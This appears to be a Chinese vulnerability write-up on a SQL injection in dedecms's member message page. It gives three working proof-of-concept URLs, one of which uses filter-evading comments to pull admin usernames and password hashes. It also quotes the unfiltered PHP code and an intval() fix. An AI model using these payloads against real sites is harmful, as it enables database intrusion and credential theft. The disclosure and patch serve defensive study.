zoukankan      html  css  js  c++  java

  • dedecms /member/pm.php SQL Injection Vul

    catalog

    1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

    1. 漏洞描述

    Dedecms会员中心注入漏洞

    Relevant Link

    http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html


    2. 漏洞触发条件

    0x1: POC1

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

    0x2: POC2

    如果报错: Safe Alert: Request Error step 1 !

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

    0x3: POC3

    报错注入

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    Relevant Link

    http://www.myhack58.com/Article/html/3/62/2014/42255.htm


    3. 漏洞影响范围
    4. 漏洞代码分析

    /member/pm.php

    else if($dopost=='read')
{
    $sql = "SELECT * FROM `#@__member_friends` WHERE  mid='{$cfg_ml->M_ID}' AND ftype!='-1'  ORDER BY addtime DESC LIMIT 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray()) 
    {
        $friends[] = $row;
    }
    //$id注入
    $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤
    if(!is_array($row))
    {
        ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
        exit();
    }
    //$id注入
    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}

    Relevant Link

    http://0day5.com/archives/1313


    5. 防御方法

    /member/pm.php

    else if($dopost=='read')
{
    $sql = "Select * From `#@__member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";
    $friends = array();
    $dsql->SetQuery($sql);
    $dsql->Execute();
    while ($row = $dsql->GetArray()) 
    {
        $friends[] = $row;
    }
    /* $id过滤 */
    $id = intval($id);
    /* */ 
    $row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
    if(!is_array($row))
    {
        ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
        exit();
    }
    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
    $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved
  • 相关阅读:
    shell 脚本3 (输出与流程控制)
    centos 添加sudo 权限
    rz安装
    centos 安装mysql
    linux删除文件未释放
    关于字符串String的编程。
    spring mvc 学习指南二
    spring mvc 学习指南一
    《 spring mvc 》学习计划
    关于jsp的总结
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4519096.html
Copyright © 2011-2022 走看看